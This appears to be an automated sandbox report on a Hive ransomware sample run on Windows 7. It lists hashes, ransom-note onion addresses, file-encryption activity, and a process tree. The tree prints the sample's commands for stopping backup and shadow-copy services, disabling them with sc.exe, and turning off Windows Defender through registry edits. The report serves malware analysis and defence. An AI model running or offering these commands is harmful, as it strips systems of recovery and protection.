Analysis
-
max time kernel
1605s -
max time network
1659s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-10-2022 14:29
Static task
static1
Behavioral task
behavioral1
Sample
decoding_data.exe
Resource
win7-20220812-en
General
-
Target
decoding_data.exe
-
Size
3.4MB
-
MD5
177417be748814f6168171a42545f9dd
-
SHA1
9c8b988e66e0fe6f9dab69b1055e4ee200531094
-
SHA256
47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
-
SHA512
c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
-
SSDEEP
49152:EynbnX4Rsrb/TFvO90dL3BmAFd4A64nsfJUvelzON7j93aqSCD0BUCoQPr8bg11t:EyrAe2lS75Hw+i4JROD5R
Malware Config
Extracted
C:\Program Files\7-Zip\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 1464 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 1760 wevtutil.exe 1416 wevtutil.exe 1492 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 1936 bcdedit.exe 664 bcdedit.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
decoding_data.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\LockProtect.raw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_CE8NTGsqzX00.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\RemoveStop.crw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_yQIe9UmfkLw0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\SaveProtect.crw => C:\Users\Admin\Pictures\SaveProtect.crw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_ToUdXYIf_X80.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\WaitTrace.png => C:\Users\Admin\Pictures\WaitTrace.png.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP__8viGW1VW0g0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\WaitTrace.png.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP__8viGW1VW0g0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\LockProtect.raw => C:\Users\Admin\Pictures\LockProtect.raw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_CE8NTGsqzX00.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\MoveDisable.tif => C:\Users\Admin\Pictures\MoveDisable.tif.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_iWxmkFlpW5Q0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\MoveDisable.tif.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_iWxmkFlpW5Q0.snwkz decoding_data.exe File renamed C:\Users\Admin\Pictures\RemoveStop.crw => C:\Users\Admin\Pictures\RemoveStop.crw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_yQIe9UmfkLw0.snwkz decoding_data.exe File opened for modification C:\Users\Admin\Pictures\SaveProtect.crw.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_ToUdXYIf_X80.snwkz decoding_data.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 2504 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
decoding_data.exedescription ioc Process File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_8GENyz7hlIE0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0335112.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_Ef5sS5oaX080.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_OFF.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_638hBaJVaio0.snwkz decoding_data.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_39hnjdvNukc0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_-cHGzPSTFQg0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_zZuXlwIUdvI0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_Lc7VLR1lOX40.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_Dg-a6MS_tSQ0.snwkz decoding_data.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_M3DvhEbcNhI0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_iEHYw7R-eak0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_tHBO4OjhW1E0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\css\cpu.css decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png decoding_data.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RICEPAPR\RICEPAPR.ELM.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_fKTcCWBwyTA0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_e3OPmEFi3Sc0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_2-5rAQYr9Is0.snwkz decoding_data.exe File opened for modification C:\Program Files\MeasureUnpublish.rtf.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_k9nqGIaHCqs0.snwkz decoding_data.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\MediaReceiverRegistrar.xml decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_I_GCVIExAjM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif decoding_data.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.ELM.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_zRYu1E6oM6E0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\PREVIEW.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_gQNugCaBGbQ0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_mCaAt9Zux8w0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_SlnfPNIw0aY0.snwkz decoding_data.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm decoding_data.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\PREVIEW.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_lMDK10vvYAo0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_l29WjLETK1c0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_oiz7a69Anfk0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_qFAhowA0HU40.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_iNUR-VIBIis0.snwkz decoding_data.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_hiEayZOrwOM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_S2iIEhzAGFM0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\localizedStrings.js decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_docked.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_VCKhPHGYnao0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_4SMiz_CEJv40.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_ME7TZ09XZDc0.snwkz decoding_data.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_ixDduaWqKdg0.snwkz decoding_data.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_bxSKg0TOzAU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_SDEVkMRWmOo0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18228_.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_6-L3vT5IvkU0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png decoding_data.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\NETWORK\THMBNAIL.PNG.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_j5aJlUZUF8w0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_hf66j-eDz4Q0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_I4i2kb8Hv0c0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_PvgFpvAK-hY0.snwkz decoding_data.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\Djfk_HOW_TO_DECRYPT.txt decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png decoding_data.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\localizedSettings.css decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_eMD22xpPX4E0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png decoding_data.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_2lPwH9fMlRY0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV.HXS.UJwSeswbAAcgJVE4CjQ423jothZt8nRKM2OJHHdaPsP_GL4G-xlYq4g0.snwkz decoding_data.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png decoding_data.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm decoding_data.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2028 sc.exe 1556 sc.exe 1876 sc.exe 1336 sc.exe 1732 sc.exe 700 sc.exe 1972 sc.exe 2012 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 540 vssadmin.exe -
Opens file in notepad (likely ransom note) 3 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXEnotepad.exepid Process 1224 NOTEPAD.EXE 824 NOTEPAD.EXE 2496 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exedecoding_data.exepid Process 1060 powershell.exe 1928 powershell.exe 604 decoding_data.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 1760 wevtutil.exe Token: SeBackupPrivilege 1760 wevtutil.exe Token: SeSecurityPrivilege 1416 wevtutil.exe Token: SeBackupPrivilege 1416 wevtutil.exe Token: SeSecurityPrivilege 1492 wevtutil.exe Token: SeBackupPrivilege 1492 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1636 wmic.exe Token: SeSecurityPrivilege 1636 wmic.exe Token: SeTakeOwnershipPrivilege 1636 wmic.exe Token: SeLoadDriverPrivilege 1636 wmic.exe Token: SeSystemProfilePrivilege 1636 wmic.exe Token: SeSystemtimePrivilege 1636 wmic.exe Token: SeProfSingleProcessPrivilege 1636 wmic.exe Token: SeIncBasePriorityPrivilege 1636 wmic.exe Token: SeCreatePagefilePrivilege 1636 wmic.exe Token: SeBackupPrivilege 1636 wmic.exe Token: SeRestorePrivilege 1636 wmic.exe Token: SeShutdownPrivilege 1636 wmic.exe Token: SeDebugPrivilege 1636 wmic.exe Token: SeSystemEnvironmentPrivilege 1636 wmic.exe Token: SeRemoteShutdownPrivilege 1636 wmic.exe Token: SeUndockPrivilege 1636 wmic.exe Token: SeManageVolumePrivilege 1636 wmic.exe Token: 33 1636 wmic.exe Token: 34 1636 wmic.exe Token: 35 1636 wmic.exe Token: SeIncreaseQuotaPrivilege 268 wmic.exe Token: SeSecurityPrivilege 268 wmic.exe Token: SeTakeOwnershipPrivilege 268 wmic.exe Token: SeLoadDriverPrivilege 268 wmic.exe Token: SeSystemProfilePrivilege 268 wmic.exe Token: SeSystemtimePrivilege 268 wmic.exe Token: SeProfSingleProcessPrivilege 268 wmic.exe Token: SeIncBasePriorityPrivilege 268 wmic.exe Token: SeCreatePagefilePrivilege 268 wmic.exe Token: SeBackupPrivilege 268 wmic.exe Token: SeRestorePrivilege 268 wmic.exe Token: SeShutdownPrivilege 268 wmic.exe Token: SeDebugPrivilege 268 wmic.exe Token: SeSystemEnvironmentPrivilege 268 wmic.exe Token: SeRemoteShutdownPrivilege 268 wmic.exe Token: SeUndockPrivilege 268 wmic.exe Token: SeManageVolumePrivilege 268 wmic.exe Token: 33 268 wmic.exe Token: 34 268 wmic.exe Token: 35 268 wmic.exe Token: SeIncreaseQuotaPrivilege 268 wmic.exe Token: SeSecurityPrivilege 268 wmic.exe Token: SeTakeOwnershipPrivilege 268 wmic.exe Token: SeLoadDriverPrivilege 268 wmic.exe Token: SeSystemProfilePrivilege 268 wmic.exe Token: SeSystemtimePrivilege 268 wmic.exe Token: SeProfSingleProcessPrivilege 268 wmic.exe Token: SeIncBasePriorityPrivilege 268 wmic.exe Token: SeCreatePagefilePrivilege 268 wmic.exe Token: SeBackupPrivilege 268 wmic.exe Token: SeRestorePrivilege 268 wmic.exe Token: SeShutdownPrivilege 268 wmic.exe Token: SeDebugPrivilege 268 wmic.exe Token: SeSystemEnvironmentPrivilege 268 wmic.exe Token: SeRemoteShutdownPrivilege 268 wmic.exe Token: SeUndockPrivilege 268 wmic.exe Token: SeManageVolumePrivilege 268 wmic.exe Token: 33 268 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
decoding_data.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 604 wrote to memory of 956 604 decoding_data.exe 26 PID 604 wrote to memory of 956 604 decoding_data.exe 26 PID 604 wrote to memory of 956 604 decoding_data.exe 26 PID 956 wrote to memory of 1656 956 net.exe 28 PID 956 wrote to memory of 1656 956 net.exe 28 PID 956 wrote to memory of 1656 956 net.exe 28 PID 604 wrote to memory of 1644 604 decoding_data.exe 29 PID 604 wrote to memory of 1644 604 decoding_data.exe 29 PID 604 wrote to memory of 1644 604 decoding_data.exe 29 PID 1644 wrote to memory of 1540 1644 net.exe 31 PID 1644 wrote to memory of 1540 1644 net.exe 31 PID 1644 wrote to memory of 1540 1644 net.exe 31 PID 604 wrote to memory of 1640 604 decoding_data.exe 32 PID 604 wrote to memory of 1640 604 decoding_data.exe 32 PID 604 wrote to memory of 1640 604 decoding_data.exe 32 PID 1640 wrote to memory of 1456 1640 net.exe 34 PID 1640 wrote to memory of 1456 1640 net.exe 34 PID 1640 wrote to memory of 1456 1640 net.exe 34 PID 604 wrote to memory of 2020 604 decoding_data.exe 35 PID 604 wrote to memory of 2020 604 decoding_data.exe 35 PID 604 wrote to memory of 2020 604 decoding_data.exe 35 PID 2020 wrote to memory of 1836 2020 net.exe 37 PID 2020 wrote to memory of 1836 2020 net.exe 37 PID 2020 wrote to memory of 1836 2020 net.exe 37 PID 604 wrote to memory of 1440 604 decoding_data.exe 38 PID 604 wrote to memory of 1440 604 decoding_data.exe 38 PID 604 wrote to memory of 1440 604 decoding_data.exe 38 PID 1440 wrote to memory of 520 1440 net.exe 40 PID 1440 wrote to memory of 520 1440 net.exe 40 PID 1440 wrote to memory of 520 1440 net.exe 40 PID 604 wrote to memory of 560 604 decoding_data.exe 41 PID 604 wrote to memory of 560 604 decoding_data.exe 41 PID 604 wrote to memory of 560 604 decoding_data.exe 41 PID 560 wrote to memory of 908 560 net.exe 43 PID 560 wrote to memory of 908 560 net.exe 43 PID 560 wrote to memory of 908 560 net.exe 43 PID 604 wrote to memory of 1700 604 decoding_data.exe 44 PID 604 wrote to memory of 1700 604 decoding_data.exe 44 PID 604 wrote to memory of 1700 604 decoding_data.exe 44 PID 1700 wrote to memory of 536 1700 net.exe 46 PID 1700 wrote to memory of 536 1700 net.exe 46 PID 1700 wrote to memory of 536 1700 net.exe 46 PID 604 wrote to memory of 1628 604 decoding_data.exe 47 PID 604 wrote to memory of 1628 604 decoding_data.exe 47 PID 604 wrote to memory of 1628 604 decoding_data.exe 47 PID 1628 wrote to memory of 1076 1628 net.exe 49 PID 1628 wrote to memory of 1076 1628 net.exe 49 PID 1628 wrote to memory of 1076 1628 net.exe 49 PID 604 wrote to memory of 1732 604 decoding_data.exe 50 PID 604 wrote to memory of 1732 604 decoding_data.exe 50 PID 604 wrote to memory of 1732 604 decoding_data.exe 50 PID 604 wrote to memory of 700 604 decoding_data.exe 52 PID 604 wrote to memory of 700 604 decoding_data.exe 52 PID 604 wrote to memory of 700 604 decoding_data.exe 52 PID 604 wrote to memory of 1972 604 decoding_data.exe 54 PID 604 wrote to memory of 1972 604 decoding_data.exe 54 PID 604 wrote to memory of 1972 604 decoding_data.exe 54 PID 604 wrote to memory of 2012 604 decoding_data.exe 56 PID 604 wrote to memory of 2012 604 decoding_data.exe 56 PID 604 wrote to memory of 2012 604 decoding_data.exe 56 PID 604 wrote to memory of 2028 604 decoding_data.exe 58 PID 604 wrote to memory of 2028 604 decoding_data.exe 58 PID 604 wrote to memory of 2028 604 decoding_data.exe 58 PID 604 wrote to memory of 1556 604 decoding_data.exe 60
Processes
-
C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"C:\Users\Admin\AppData\Local\Temp\decoding_data.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1656
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1540
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1456
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1836
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:520
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:908
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:536
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1076
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:700
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:2012
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:2028
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1876
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1832
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1980
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:940
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1404
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:952
-
-
